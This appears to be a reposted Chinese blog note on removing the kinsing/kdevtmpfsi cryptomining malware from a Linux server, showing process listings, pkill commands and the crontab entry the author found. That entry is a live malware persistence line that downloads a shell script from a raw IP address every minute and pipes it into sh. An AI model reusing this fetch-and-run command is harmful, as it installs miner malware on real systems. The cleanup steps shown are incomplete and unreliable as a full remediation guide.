1. 全栈程序员必看首页

linux 中了挖矿病毒

全栈程序员-站长 未分类 阅读 43

linux 中了挖矿病毒文章目录中毒特征磁盘cpu跑满100%如何处理反复发作中毒特征磁盘cpu跑满100%如何处理电脑中了挖矿病毒ps-aux|grepkinsingroot194470.01.811917235084?Sl4月150:04/var/tmp/kinsingroot272470.00.0112728…

大家好,又见面了,我是你们的朋友全栈君。

文章目录

中毒特征磁盘cpu 跑满 100%

在这里插入图片描述

如何处理

电脑中了挖矿病毒

ps -aux | grep kinsing
root     19447  0.0  1.8 119172 35084 ?        Sl   415   0:04 /var/tmp/kinsing
root     27247  0.0  0.0 112728   972 pts/0    D+   07:47   0:00 grep --color=auto kinsing


ps -aux | grep kdevtmpfsi
root     25493 94.7  0.0 515448  1620 ?        Ssl  07:46   1:17 /tmp/kdevtmpfsi
root     27249  0.0  0.0 112728   980 pts/0    R+   07:47   0:00 grep --color=auto kdevtmpfsi


pkill -9 kinsing
pkill -9 kdevtmpfsi

反复发作

#杀掉以后还会换端口
pkill -9 kinsing
[root@localhost tmp]# ps -aux | grep kinsing
root      6087  0.0  0.0 112728   976 pts/0    S+   07:56   0:00 grep --color=auto kinsing

查看定时任务
crontab -l
* * * * * wget -q -O - http://195.3.146.118/h2.sh | sh > /dev/null 2>&1
 
 pkill -9 kinsing
 ps -aux | grep kinsing
终于删掉了
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/133160.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长
0 0


相关推荐

  • kong安装与部署

    kong安装与部署

    kong安装与部署Centos7单机部署kong文档步骤 前置步骤:已安装jdk1.8和tomcat部署环境:centos7目标任务:kong:v0.14.x,postgresql:v10.5(注意:psql版本必须与kong版本对应)耗时任务:nodejs的安装(40+分钟) 安装依赖包安装gcc编译环境$yuminstall-ygccgcc-c++pcr…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年6月26日
    23
  • 周末随笔「建议收藏」

    周末随笔「建议收藏」

    随便记录,聊以自慰这段时间的心思在工作上,也有一段时间没写一些东西了,内心有一些想法,搁置起来了。去年有段时间想着搞搞副业,说实话副业没赚到多少,几百上千的,还是自己能力不够。还是想办法先努力提高主业的收入,作为一个打工者,目前无非就是看哪里搬砖收益更好一点,能有更多点的成长而已。作为程序员,自己对技术的热情大多数只是停留在工作的使用上。这个技术工作中用了没有热情也是强制去了解去学习,要不就慢慢等着淘汰。单独靠热情驱动,还没发现自己真正对什么东西充满热情,有时候觉得可悲,无奈。工作对于目前的我来.

    全栈程序员-站长的头像 全栈程序员-站长
    2022年3月1日
    38
  • nextline函数_在JAVA中Scanner中的next()和nextLine()为什么不能一起使用?

    nextline函数_在JAVA中Scanner中的next()和nextLine()为什么不能一起使用?

    nextline函数_在JAVA中Scanner中的next()和nextLine()为什么不能一起使用?Java输入一直是一个坑,本来一直用Scanner,但一直搞不懂换行符啥的,就用BufferReader,但前不久大疆笔试需要持续输入,早忘了Scanner怎么写,而那个场景用Scanner很好实现……就继续在这里记录一下Scanner的坑吧一、next&nextLine区别next不能得到带有空格的字符串一定要读到有效字符后才可以结束,结束条件是碰到空格…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年6月2日
    37
  • 你也可以成为VTuber

    你也可以成为VTuber

    你也可以成为VTuber

    全栈程序员-站长的头像 全栈程序员-站长
    2021年7月5日
    80
  • 【AekdyCoin】求小于等于N的与N互质的数的和

    【AekdyCoin】求小于等于N的与N互质的数的和

    【AekdyCoin】求小于等于N的与N互质的数的和又向大牛学到了一点。以下内容转大牛文章:ifgcd(n,i)=1thengcd(n,n-i)=1(1反证法:如果存在K!=1使gcd(n,n-i)=k,那么(n-i)%k==0而n%k=0那么必须保证i%k=0k是n的因子,如果i%k=0那么gcd(n,i)=k,矛盾出现;于是问题变的非常简单ANS=N*phi(N)/2i,n-i总是成对

    全栈程序员-站长的头像 全栈程序员-站长
    2022年7月23日
    7
  • 添加gitignore文件后使其生效

    添加gitignore文件后使其生效

    添加gitignore文件后使其生效

    全栈程序员-站长的头像 全栈程序员-站长
    2021年10月20日
    50

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号